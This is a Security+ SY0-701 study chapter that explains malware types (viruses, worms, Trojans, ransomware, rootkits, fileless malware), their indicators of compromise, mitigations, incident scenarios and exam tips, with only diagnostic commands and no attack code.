Malware is any software intentionally designed to cause damage, disrupt operations, or gain unauthorized access to computer systems. This chapter covers the various types of malware, their characteristics, and how they operate, which is critical for the SY0-701 exam under Objective 2.4: 'Given a scenario, analyze indicators of malicious activity.' Mastering malware types helps you identify and respond to threats effectively in both the exam and real-world IT security roles.
Jump to a section
Imagine the human immune system defending against pathogens. A virus is a microscopic particle that hijacks a host cell to replicate, much like a computer virus attaches to a legitimate program and uses system resources to copy itself. A worm is like a parasite that can move through the bloodstream independently, exploiting network vulnerabilities to spread without a host file. Trojan horses are like a benign-looking pill that contains poison; they disguise as useful software but execute malicious actions. Ransomware is like a disease that locks down a vital organ and demands a ransom for the antidote. Spyware is like a hidden camera that monitors your activities and reports back. Rootkits are like a pathogen that hides deep in the body's core systems, evading detection by altering immune responses. Botnets are like a coordinated swarm of insects controlled by a single entity to attack a target. Each malware type has a unique mechanism, just as each pathogen has a specific mode of infection and replication. Understanding these mechanisms helps in developing countermeasures, just as vaccines and antibiotics target specific biological processes.
What is Malware?
Malware (malicious software) is a broad term encompassing viruses, worms, Trojans, ransomware, spyware, adware, rootkits, bootkits, backdoors, logic bombs, and fileless malware. Each type has distinct infection vectors, behaviors, and payloads. Understanding these is essential for threat analysis and incident response.
Virus Characteristics
A virus is a self-replicating program that attaches itself to a legitimate executable or script. It requires user action (e.g., opening a file) to activate. Once executed, it copies itself into other programs or system areas. Viruses can corrupt files, steal data, or create backdoors. Common types include: - File infector virus: Attaches to .exe or .com files. - Macro virus: Written in macro languages (e.g., VBA) in documents. - Boot sector virus: Infects the Master Boot Record (MBR) or Volume Boot Record (VBR). - Polymorphic virus: Changes its code signature each replication to evade antivirus. - Metamorphic virus: Rewrites its entire code to avoid detection.
Example: The CIH virus (Chernobyl) overwrote the BIOS, rendering systems unbootable.
Worm Characteristics
A worm is standalone malware that replicates without user intervention, exploiting network vulnerabilities or misconfigurations. It uses network protocols (e.g., SMB, HTTP) to spread. Worms often carry payloads like backdoors or DDoS agents. The Morris worm (1988) exploited buffer overflows in sendmail and finger, infecting ~10% of internet-connected systems.
Trojan Horse Characteristics
A Trojan disguises as legitimate software (e.g., game, utility) but contains malicious code. Unlike viruses/worms, Trojans do not self-replicate. They rely on social engineering to trick users into installing them. Common Trojans: - Remote Access Trojan (RAT): Provides attacker full control (e.g., PoisonIvy, DarkComet). - Banking Trojan: Steals financial credentials (e.g., Zeus, Emotet). - Dropper Trojan: Installs other malware.
Ransomware
Ransomware encrypts files or locks systems and demands payment (usually cryptocurrency) for decryption. Two main types: - Encrypting ransomware: Encrypts files using AES or RSA (e.g., CryptoLocker, WannaCry). - Locker ransomware: Locks the entire system (e.g., WinLocker).
WannaCry (2017) exploited EternalBlue (CVE-2017-0144) in SMBv1 to spread rapidly, affecting 230,000+ systems.
Spyware and Adware
Spyware covertly collects user data (keystrokes, browsing habits) and sends it to attackers. Adware displays unwanted ads, often bundled with free software. Both degrade performance and compromise privacy. Keyloggers capture keystrokes; browser hijackers redirect searches.
Rootkits and Bootkits
A rootkit hides malicious activity by modifying the OS kernel or using kernel-mode drivers. It achieves persistence and stealth, often undetected by standard antivirus. Bootkits infect the boot process (MBR, UEFI), loading before the OS. Example: The Sony BMG rootkit (2005) hid copy-protection software, creating a backdoor.
Backdoor and Logic Bomb
A backdoor bypasses normal authentication to give attackers remote access. Often left by Trojans or worms. A logic bomb is code triggered by a specific event (e.g., date, user action). Example: A disgruntled employee sets a logic bomb to delete files on their termination date.
Fileless Malware
Fileless malware operates in memory without writing files to disk, evading signature-based detection. It uses legitimate tools like PowerShell, WMI, or .NET to execute payloads. Attackers inject code into running processes (e.g., via reflective DLL injection). Example: The PowerShell-based malware Kovter.
Command and Examples
Use netstat -ano to find suspicious connections.
tasklist /svc shows running services.
wmic process list reveals processes.
For rootkit detection, use chkrootkit (Linux) or GMER (Windows).
Ransomware often leaves ransom notes like @[decrypt].txt.
Indicators of Compromise (IoCs)
Common IoCs include:
Unusual network traffic (e.g., C2 communication on non-standard ports).
File changes (e.g., renamed executables, new scheduled tasks).
Registry modifications (e.g., HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run).
System slowdowns, pop-ups, disabled security tools.
Mitigation
Use antivirus/anti-malware with heuristic and behavioral analysis.
Enable Windows Defender or EDR solutions.
Apply patches promptly (e.g., MS17-010 for EternalBlue).
Implement least privilege and application whitelisting.
Use network segmentation and intrusion detection systems (IDS).
Regular backups stored offline.
User training to avoid phishing and suspicious downloads.
Infection Vector Identification
Malware enters a system via vectors like email attachments (phishing), malicious downloads, USB drives, drive-by downloads, or exploiting unpatched vulnerabilities. For example, a user opens a phishing email with a macro-enabled Word document. The macro downloads and executes the payload. Tools like email filters and sandboxes can detect malicious attachments. Logs show the inbound email, the file download, and eventual execution.
Execution and Persistence
Once executed, malware establishes persistence to survive reboots. Common techniques: writing to registry Run keys (`HKCU\Software\Microsoft\Windows\CurrentVersion\Run`), creating scheduled tasks, installing as a service, or using bootkits. For example, a rootkit modifies the MBR. Tools like `autoruns` can reveal persistence mechanisms. Event logs (e.g., Event ID 4698 for scheduled tasks) show creation.
Privilege Escalation
Malware often escalates privileges to gain admin access. Techniques include exploiting vulnerabilities (e.g., CVE-2020-0787), using credential dumping (Mimikatz), or token manipulation. After escalation, it can disable security software. Logs show privilege use events (Event ID 4672) or unusual process elevation. Tools like Sysmon can detect `lsass.exe` access.
Defense Evasion
Malware avoids detection by obfuscating code, packing executables, using encryption, or disabling AV. Fileless malware runs in memory. Rootkits hook system calls. Polymorphic viruses change signatures. Logs may show process hollowing or DLL injection. EDR tools detect anomalous behavior like PowerShell downloading code from the internet.
Payload Delivery and Impact
The final payload executes: ransomware encrypts files, spyware exfiltrates data, worm spreads to other systems. For ransomware, file extensions change (e.g., `.encrypted`), ransom notes appear. Data exfiltration uses DNS tunneling or HTTP POST. Network logs show large outbound transfers to unknown IPs. Incident responders isolate the host and analyze the payload.
Scenario 1: Ransomware Outbreak at a Hospital
A hospital's IT team notices files on a file server have been renamed with .encrypted extension and a ransom note HowToDecrypt.txt appears. The attack started when an employee opened a phishing email with a malicious Excel macro. The macro downloaded LockBit ransomware, which then encrypted network shares using AES-256. The attacker demanded 50 BTC. The SOC used EDR logs to trace the initial execution, identified the user's machine, and isolated it. They restored files from offline backups, avoiding payment. Common mistake: paying the ransom, which funds attackers and may not guarantee decryption.
Scenario 2: Bank Trojan Stealing Credentials A financial institution detects unusual outbound traffic from a teller's workstation to a foreign IP on port 443. The workstation has Zeus banking Trojan, which captures keystrokes and web form data. The infection vector was a drive-by download from a compromised ad network. The SOC used network traffic analysis (e.g., Zeek logs) to identify the C2 communication. They blocked the IP, scanned the host, and removed the malware. Common mistake: assuming HTTPS traffic is safe; attackers use SSL to hide C2 traffic.
Scenario 3: Fileless Malware in a Corporate Network
An enterprise EDR alerts on powershell.exe spawning cmd.exe with encoded commands. The fileless malware uses PowerShell to download and execute a payload in memory. The attacker exploited an unpatched vulnerability in Internet Explorer (CVE-2018-8653). The SOC investigated by capturing memory dumps and analyzing PowerShell script blocks. They patched the vulnerability and blocked PowerShell execution from untrusted sources. Common mistake: ignoring PowerShell alerts as administrative activity.
SY0-701 Testing Focus
Objective 2.4 requires you to analyze indicators of malicious activity. The exam tests your ability to identify malware types from given scenarios. Key sub-objectives:
Differentiate between viruses, worms, Trojans, ransomware, spyware, adware, rootkits, and fileless malware.
Recognize characteristics: self-replication (virus/worm), stealth (rootkit), encryption (ransomware), social engineering (Trojan).
Identify common IoCs: unusual network traffic, file changes, registry modifications, processes, services.
Common Wrong Answers
Virus vs. Worm: Candidates often think both need user action. Reality: worms spread automatically. Wrong choice if scenario says "spreads without user interaction".
Trojan vs. Backdoor: All Trojans are not backdoors; Trojans may deliver other payloads. Backdoor is a specific type of Trojan providing access.
Spyware vs. Adware: Spyware collects data; adware shows ads. Both can be unwanted, but spyware is stealthy.
Rootkit vs. Bootkit: Rootkits operate at kernel level; bootkits infect boot process. Both hide, but bootkits load earlier.
Specific Terms
Polymorphic: Changes signature each infection.
Metamorphic: Rewrites code entirely.
RAT: Remote Access Trojan.
C2: Command and Control.
Mimikatz: Credential dumping tool.
Trick Questions
Scenario: "Malware that replicates and spreads via network shares" — answer worm, not virus.
Scenario: "Malware that hides by modifying the MBR" — answer bootkit, not rootkit.
Scenario: "Malware that encrypts files and demands payment" — answer ransomware, not Trojan.
Decision Rule
For scenario questions, identify the key behavior: self-replication -> worm; user action required -> virus; disguise -> Trojan; encryption -> ransomware; stealth -> rootkit/bootkit; data theft -> spyware; no file on disk -> fileless. Eliminate options that contradict the behavior.
Malware types: virus (self-replicating, needs host), worm (self-replicating, standalone), Trojan (disguised), ransomware (encrypts/locks), spyware (data theft), adware (ads), rootkit (hides in kernel), bootkit (infects boot process), fileless (memory-only).
WannaCry ransomware exploited EternalBlue (CVE-2017-0144) in SMBv1 on port 445.
Polymorphic malware changes its signature each replication; metamorphic rewrites its code.
Ransomware often uses AES for encryption and RSA for key exchange.
Rootkits can be detected by booting from a trusted CD/USB and using offline scanners like GMER or chkrootkit.
Fileless malware often uses PowerShell, WMI, or .NET; logs show `powershell.exe` with encoded commands.
Common IoCs: unusual network traffic (C2), registry changes, new scheduled tasks, disabled security services.
Mitigation: patch management, application whitelisting, least privilege, backups, user training, EDR.
On SY0-701, key differentiator: replication method (virus vs worm), stealth (rootkit vs bootkit), payload (ransomware encryption).
Always verify malware type by behavior: self-spreading = worm, encryption = ransomware, hidden = rootkit/bootkit.
These come up on the exam all the time. Here's how to tell them apart.
Virus
Requires user action to execute
Attaches to host files or programs
Replicates by infecting other files
Often spreads via removable media or email attachments
Example: CIH virus
Worm
Self-replicates without user intervention
Standalone executable
Exploits network vulnerabilities to spread
Consumes network bandwidth
Example: Morris worm
Trojan
Disguises as legitimate software
Does not self-replicate
May deliver various payloads (RAT, spyware, etc.)
Relies on social engineering
Example: Zeus Trojan
Backdoor
A type of Trojan that provides remote access
Bypasses authentication
Often used for persistent control
Can be installed by other malware
Example: PoisonIvy RAT
Mistake
All malware that spreads is a virus.
Correct
Worms spread automatically without user action; viruses require user interaction to propagate.
Mistake
Trojans can replicate themselves like viruses.
Correct
Trojans do not self-replicate; they rely on social engineering to trick users into installing them.
Mistake
Ransomware always encrypts all files immediately.
Correct
Some ransomware (locker) locks the system without encryption, and some encrypt files gradually to avoid detection.
Mistake
Fileless malware cannot be detected by antivirus.
Correct
Fileless malware can be detected by behavioral analysis, memory scanning, and EDR tools, though it evades signature-based detection.
Mistake
Rootkits only affect the operating system kernel.
Correct
Rootkits can also affect user-mode applications, hypervisors (hypervisor rootkits), or firmware.
A virus requires user action (e.g., opening a file) to execute and replicate, attaching itself to legitimate programs. A worm is standalone and self-replicates without user intervention, exploiting network vulnerabilities. For the exam, if a scenario says 'spreads automatically across the network,' choose worm; if it says 'attached to an email attachment and executed by user,' choose virus.
A rootkit is a set of tools that hides malicious activity by modifying the operating system kernel or using kernel-mode drivers. It can intercept system calls to hide files, processes, and registry keys from standard tools. For example, a rootkit might hook the `ZwQuerySystemInformation` API to hide processes. Detection often requires booting from a trusted medium and using specialized scanners.
Fileless malware operates in memory without writing files to disk, making it hard for signature-based antivirus to detect. It uses legitimate system tools like PowerShell, WMI, or .NET to execute code. For instance, an attacker sends a phishing email with a malicious link that downloads a PowerShell script in memory. The script then downloads and runs a payload (e.g., Mimikatz) without touching the hard drive.
Ransomware is malware that encrypts files or locks the system and demands payment for decryption. A Trojan is a type of malware disguised as legitimate software that may perform various malicious actions, including delivering ransomware. However, not all Trojans are ransomware; Trojans can also spy, steal data, or create backdoors. On the exam, if the scenario mentions encryption and a ransom note, choose ransomware.
Common indicators include: unexpected system slowdowns, frequent crashes, unusual network traffic (e.g., connections to unknown IPs), new files or renamed files, changes to registry keys (especially Run keys), disabled security software, pop-up ads, and ransom notes. For example, in a ransomware attack, you might see files with `.encrypted` extension and a text file named `HOW_TO_DECRYPT.txt`.
A logic bomb is a piece of malicious code that executes when a specific condition is met, such as a date, time, or user action. It is often inserted by insiders with legitimate access. For example, a disgruntled employee might set a logic bomb to delete critical files on the day they are terminated. Unlike other malware, logic bombs do not replicate and are not standalone; they are embedded in legitimate programs.
Prevention includes: regular offline backups, patch management (especially for SMB vulnerabilities like EternalBlue), user training to avoid phishing, application whitelisting, disabling macros in Office documents, using email filtering, and implementing the principle of least privilege. Additionally, network segmentation can limit ransomware spread. For the exam, remember that backups are the most effective defense against ransomware.
You've just covered Malware Types and Characteristics — now see how well it sticks with free SY0-701 practice questions. Full explanations included, no account needed.
Done with this chapter?